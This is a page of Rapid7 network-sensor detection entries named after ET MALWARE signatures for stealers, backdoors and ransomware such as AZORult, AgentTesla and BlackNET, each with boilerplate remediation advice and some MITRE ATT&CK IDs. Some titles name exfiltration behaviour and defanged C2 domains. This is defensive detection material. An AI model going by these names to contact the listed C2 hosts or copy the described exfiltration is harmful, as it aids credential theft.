This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AgentTesla Variant Exfil via Telegram

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Agent.UWW Variant Activity (Retrieving Commands)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Agent.UWW Variant Activity (Sending System Information)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Agent.WMN CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Agent.WVW CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Agent.WVW CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Agent.WVW CnC Beacon 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Agent.XST Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Agent.XST/UP007 Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Alpha Stealer v1.5 PWS Exfil via HTTP

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Androm.gnlb Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AnteFrigus Ransomware Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Arkei Stealer CnC Checkin (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Arkei Stealer CnC Checkin (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ArmyOfUkraine Bot Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ArtraDownloader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ArtraDownloader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ASPC Bot CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ASPC Bot CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ASPC Bot CnC Checkin M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Aura Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/AutoIt.NU Miner Dropper CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Autophyte.F C2 Domain (tpddata .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Autophyte.F C2 Domain (www .anlway .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Autophyte.F C2 Domain (www .ap8898 .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Autophyte.F C2 Domain (www .apshenyihl .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Avaddon Ransomware Style External IP Address Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/AZORult V3.2 Client Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M10

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M11

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M12

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M13

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M14

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M15

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M16

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M17

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M18

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M19

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M20

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M21

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M22

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M23

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M24

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M7

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M8

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M9

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M10

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M11

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M12

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M13

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M14

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M15

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M16

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M17

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M18

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M19

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M20

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M21

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M22

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M23

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M24

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M7

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M8

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M9

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Agent.qweydh CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Agent.qweydh CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Agent.qweydh CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor Checkin (POST)

Description
Copy link

Recommendation
Copy link

ET MALWARE Win32/Backdoor.Daxin CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Dripion External IP Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Dripion HTTP CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Graphon Checkin Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Randrew.A CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor Retrieving Task (POST)

Description
Copy link

Recommendation
Copy link

ET MALWARE Win32/Backdoor Sending Task Status (POST)

Description
Copy link

Recommendation
Copy link

ET MALWARE Win32/Backdoor.Small.ao CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.YesMaster CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Bancos.AMM CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Bancos URL Structure

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Banker.bqba Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Banload.BTQP Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Banload.BTQP Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BanloadDownloader.XZY Retrieving Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BazarLoader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Beapy/Lemon_Duck CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Beaugrit.gen.AAAA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Bicololo Response 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Bicololo Response 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Bisonal Backdoor CnC Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Bisonal CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Bisonal RC4 Encrypted 8 Byte Static CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Blackbeard Downloader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BlackNET CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BlackNET CnC Keep-Alive

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BlackNET CnC Requesting Command

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BLUELIGHT OAuth Login Attempt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BLUELIGHT OAuth Login Attempt M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Bot.Sezin CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

